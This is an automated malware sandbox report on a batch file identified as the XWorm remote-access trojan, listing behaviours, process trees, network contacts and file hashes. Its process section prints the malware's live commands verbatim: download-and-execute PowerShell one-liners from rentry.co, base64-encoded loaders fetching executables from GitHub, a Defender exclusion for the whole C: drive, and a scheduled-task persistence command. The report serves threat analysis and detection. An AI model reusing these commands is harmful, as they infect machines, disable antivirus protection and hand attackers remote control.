Analysis Overview
SHA256
57754e153ca09796a238926d33c4ade8686c94c1bde3040405ea793afb273065
Threat Level: Known bad
The file $77APCONSVC.bat was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Blocklisted process makes network request
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Drops file in Windows directory
Enumerates physical storage devices
Creates scheduled task(s)
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-02 14:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-02 14:33
Reported
2024-04-02 14:35
Platform
win11-20240221-en
Max time kernel
106s
Max time network
113s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Exclusions.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ntelCpHDCPSvc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ntelCpHDCPSvc.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Panther\UnattendGC\setupact.log | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4181651180-3163410697-3990547336-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\ntelCpHDCPSvc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\ntelCpHDCPSvc.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm rentry.co/Hokm/raw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAHEAMABMAFoAYwBFAGkAbgBKAHIAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAHoANwA3AGYALwBFAHgAYwBsAHUAcwBpAG8AbgBzAC8AcgBhAHcALwBtAGEAaQBuAC8ARQB4AGMAbAB1AHMAaQBvAG4AcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwBFAHgAYwBsAHUAcwBpAG8AbgBzAC4AZQB4AGUAJwA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAHUAcgBsACwAIAAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAOwB9AGUAbABzAGUAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAHoANwA3AGYALwBFAHgAYwBsAHUAcwBpAG8AbgBzAC8AcgBhAHcALwBtAGEAaQBuAC8ARQB4AGMAbAB1AHMAaQBvAG4AcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwBFAHgAYwBsAHUAcwBpAG8AbgBzAC4AZQB4AGUAJwA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAHUAcgBsACwAIAAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAOwB9AA==
C:\Users\Admin\AppData\Local\Temp\Exclusions.exe
"C:\Users\Admin\AppData\Local\Temp\Exclusions.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -WindowStyle Hidden -Command Add-MpPreference -ExclusionPath 'C:\'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm rentry.co/windowscop/raw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAHMANQBVADcASwBXAEIAeQA5AE8AIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvADkAMwBiAGwAYQBvAHkALwBJAG4AdABlAGwAQwBwAEgARABDAFAAUwB2AGMAMgAyADMALwByAGEAdwAvAG0AYQBpAG4ALwBJAG4AdABlAGwAQwBwAEgARABDAFAAUwB2AGMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAbgB0AGUAbABDAHAASABEAEMAUABTAHYAYwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoACAALQBWAGUAcgBiACAAUgB1AG4AQQBzADsAfQBlAGwAcwBlACAAewAkAHUAcgBsACAAPQAgACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwA5ADMAYgBsAGEAbwB5AC8ASQBuAHQAZQBsAEMAcABIAEQAQwBQAFMAdgBjADIAMgAzAC8AcgBhAHcALwBtAGEAaQBuAC8ASQBuAHQAZQBsAEMAcABIAEQAQwBQAFMAdgBjAC4AZQB4AGUAJwA7ACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAD0AIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAnAG4AdABlAGwAQwBwAEgARABDAFAAUwB2AGMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAA7AH0A
C:\Users\Admin\AppData\Local\Temp\ntelCpHDCPSvc.exe
"C:\Users\Admin\AppData\Local\Temp\ntelCpHDCPSvc.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntelCpHDCPSvc" /tr "C:\Users\Admin\AppData\Roaming\ntelCpHDCPSvc.exe"
C:\Users\Admin\AppData\Roaming\ntelCpHDCPSvc.exe
C:\Users\Admin\AppData\Roaming\ntelCpHDCPSvc.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 104.21.95.148:80 | rentry.co | tcp |
| US | 104.21.95.148:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | 148.95.21.104.in-addr.arpa | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 104.21.95.148:80 | rentry.co | tcp |
| US | 104.21.95.148:443 | rentry.co | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 147.185.221.17:50064 | tcp | |
| US | 147.185.221.17:50064 | tcp | |
| GB | 92.123.128.171:443 | tcp | |
| GB | 92.123.128.171:443 | tcp | |
| IE | 13.69.239.79:443 | browser.pipe.aria.microsoft.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| GB | 95.101.143.195:443 | r.bing.com | tcp |
| US | 52.111.229.19:443 | tcp | |
| GB | 2.18.66.169:443 | www.bing.com | tcp |
| GB | 104.78.171.70:443 | cxcs.microsoft.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i0vovggi.xrq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3828-8-0x0000028FBF3D0000-0x0000028FBF3F2000-memory.dmp
memory/3828-9-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/3828-10-0x0000028FBF1B0000-0x0000028FBF1C0000-memory.dmp
memory/3828-11-0x0000028FBF1B0000-0x0000028FBF1C0000-memory.dmp
memory/3828-12-0x0000028FBF1B0000-0x0000028FBF1C0000-memory.dmp
memory/3828-13-0x0000028FBF9A0000-0x0000028FBFB62000-memory.dmp
memory/1224-14-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/1224-15-0x00000213F9AB0000-0x00000213F9AC0000-memory.dmp
memory/1224-24-0x00000213F9AB0000-0x00000213F9AC0000-memory.dmp
memory/1224-25-0x00000213FA6B0000-0x00000213FABD8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Exclusions.exe
| MD5 | 7a8a167aa932adf70e56092286bc78fa |
| SHA1 | 898ad11a51d73aac4a2f6b9ca1605bd247b638df |
| SHA256 | 7eac536d3a70d7611d17d7264a600f629422d22a76c6b0714c256e2a86d636f6 |
| SHA512 | 8173301f56ae0f1e8a96832699c18abacb9279609f485602f5bdc228678ced6001b7deb6ef34c2df00185d8c7834cd5677d4035e87d6f71a01a9941c4444557e |
memory/1224-39-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a2d4f8f586db3a1bf63dae4b3f6e95f0 |
| SHA1 | 0e15301e9601b00ff0e3355ed31ee8be38abda64 |
| SHA256 | f196ca71b518471837346a0f7b124bd6687c73b766208c844fdf86c4ac520a27 |
| SHA512 | 43129285995077704c5c68b115a89e3027fa0c34ef3ad07af0be1397e51e972ab4cfa35460d53ad643cf8f0da9a01adb17f605459a258c8efd96be7d5b07be36 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 46cdba1da80767357c761c7c088d884a |
| SHA1 | 5204853290d20e63c54aa08c0750905f9698e563 |
| SHA256 | 3744bbf2527d056a2c0e3ea22a5b19bf9bbdc491a72df5b7563d875f075787a6 |
| SHA512 | c8dd60f7dc30e67a72efc8631d0ef9ec0cfd40ba822d5827bd5ba1f63bacac27a6a2243902d7986acf4110264f02809d74603a91965c2809b3f0194c6147ea34 |
memory/2724-43-0x0000000000DD0000-0x0000000000DD8000-memory.dmp
memory/2724-44-0x0000000074DE0000-0x0000000075591000-memory.dmp
memory/3828-45-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/2724-47-0x0000000074DE0000-0x0000000075591000-memory.dmp
memory/2676-48-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/2676-49-0x0000022C6ABE0000-0x0000022C6ABF0000-memory.dmp
memory/3936-59-0x0000000074E60000-0x0000000075611000-memory.dmp
memory/3936-60-0x00000000048F0000-0x0000000004900000-memory.dmp
memory/3936-62-0x0000000004F70000-0x000000000559A000-memory.dmp
memory/3936-61-0x00000000048F0000-0x0000000004900000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ad60aefe903d80a798b904be4a3f0283 |
| SHA1 | 5a27227a9aec298c043d9fe4162cc64664c01a25 |
| SHA256 | 17c944d3e6e2a0dd06c58ae9cefe305fa7da552c010c012625abcc9585eeb214 |
| SHA512 | 5a9ed746dd825929a2fa1a00b983563538be92a6b85df3728177e3a026babf659c0afadbf544c27aeae9b492b62ac9319af50eeeae610b0aee5256966d96470a |
memory/3936-58-0x0000000004900000-0x0000000004936000-memory.dmp
memory/3936-64-0x00000000055D0000-0x00000000055F2000-memory.dmp
memory/3936-65-0x00000000057F0000-0x0000000005856000-memory.dmp
memory/3936-66-0x0000000005860000-0x00000000058C6000-memory.dmp
memory/3936-75-0x00000000058E0000-0x0000000005C37000-memory.dmp
memory/3936-76-0x0000000005DB0000-0x0000000005DCE000-memory.dmp
memory/3936-77-0x0000000005E50000-0x0000000005E9C000-memory.dmp
memory/3652-78-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/3652-80-0x0000020CEF8A0000-0x0000020CEF8B0000-memory.dmp
memory/3652-79-0x0000020CEF8A0000-0x0000020CEF8B0000-memory.dmp
memory/3936-90-0x0000000006D90000-0x0000000006DC4000-memory.dmp
memory/3936-91-0x0000000071050000-0x000000007109C000-memory.dmp
memory/3936-89-0x000000007F8B0000-0x000000007F8C0000-memory.dmp
memory/3936-101-0x00000000048F0000-0x0000000004900000-memory.dmp
memory/3936-100-0x0000000006370000-0x000000000638E000-memory.dmp
memory/3936-102-0x0000000006E50000-0x0000000006EF4000-memory.dmp
memory/3936-103-0x00000000077B0000-0x0000000007E2A000-memory.dmp
memory/3936-104-0x0000000007170000-0x000000000718A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ntelCpHDCPSvc.exe
| MD5 | 645384c8b2ed0e08aed63ed58ecb9720 |
| SHA1 | 666eefdf934dbb63b835817a2ac31b3e923662a9 |
| SHA256 | cec2f548fbf7c1abf104af50e13301b8d46ee1be21a37579d81549ec4699b33b |
| SHA512 | 2f46e13a25d2ec2b6182f0efdb0200356c9eeaae554c4781f46f701109058f9df8088b38c990b326c4cb8ff887d42660fdea1a873166bcb335992b36398e3c0b |
memory/3936-113-0x00000000071F0000-0x00000000071FA000-memory.dmp
memory/4656-118-0x00000000006E0000-0x00000000006EE000-memory.dmp
memory/3652-120-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/2676-119-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/3936-121-0x0000000007400000-0x0000000007496000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a1a3f9433eb42ddf260af753ba66dc3f |
| SHA1 | 2d4f874754eab0bcc2611d3f54e303116f620730 |
| SHA256 | 1f4425454d3ccef1488ee6fa4dbf56c4c972861f9ecd56fe23cbfeb261558a03 |
| SHA512 | 8eb723a2ee37ec0526cbcc42f6360fb7091aedc2cf143ae7bc4bdfb9793c26fb6507eb15453396e4c9cb204eb19550956f9cdce58fdc94906d8d8a73b39c5637 |
memory/4656-125-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/3936-124-0x0000000007380000-0x0000000007391000-memory.dmp
memory/2676-126-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/3936-127-0x00000000073B0000-0x00000000073BE000-memory.dmp
memory/3936-128-0x00000000073C0000-0x00000000073D5000-memory.dmp
memory/3936-129-0x00000000074C0000-0x00000000074DA000-memory.dmp
memory/3936-130-0x00000000074B0000-0x00000000074B8000-memory.dmp
memory/3936-134-0x0000000074E60000-0x0000000075611000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1dc99fbb1ba0df8c6586b12368016957 |
| SHA1 | f071eb96c9e7f7875ddeafe67d5012c6f459a4ec |
| SHA256 | b7ad6396f957cf8f422e3325c4f6b02c2fd17e8f53671ced30457c25adf36c8f |
| SHA512 | ac4173dac07e8a85e4bac5b941a5e2334f3ae6c637b608a93c7832e93d44c0b1c6d60299854ed439e77e7e9cae45b88c4791a9f8dd5f7fce4d6835ccd5b62348 |
memory/4656-136-0x0000000000F20000-0x0000000000F30000-memory.dmp
memory/4656-137-0x000000001BD30000-0x000000001BD3A000-memory.dmp
memory/4656-138-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/4272-141-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
memory/4272-143-0x00007FFDA5710000-0x00007FFDA61D2000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | 82678367fa4297a26727ccc84e0b2f60 |
| SHA1 | 0c65ab90390566f7d2f5b4751b9027f6bac1d22a |
| SHA256 | fbf7356b28e05edc871dda40b318b147e6d07ece028da3d67c3cfbd30bfa0f29 |
| SHA512 | e5474444eecac25a06fe26a22dce9aa9311740dca264de1c824a36a7bc55216f301e934667fe0b9c3c7b062694f8a37e45ecce6b3889cb33bb47ecb9bd198db5 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | 28d32a16ce87d488acc7632092f7d566 |
| SHA1 | 325dd247e49113dd987531ffe7ca26c22ce08c31 |
| SHA256 | ba6d4f09117c098bd27508a14d44822f13399ebe16d5d2539ad2844157fa4907 |
| SHA512 | 8159021f9d0e28d370faddf7fa41aa9d4bdf7a1aee71779706e43c30486526a0636568d8f90c580da543f8393f546090f71f87382f99e3e0a2b227b04670af57 |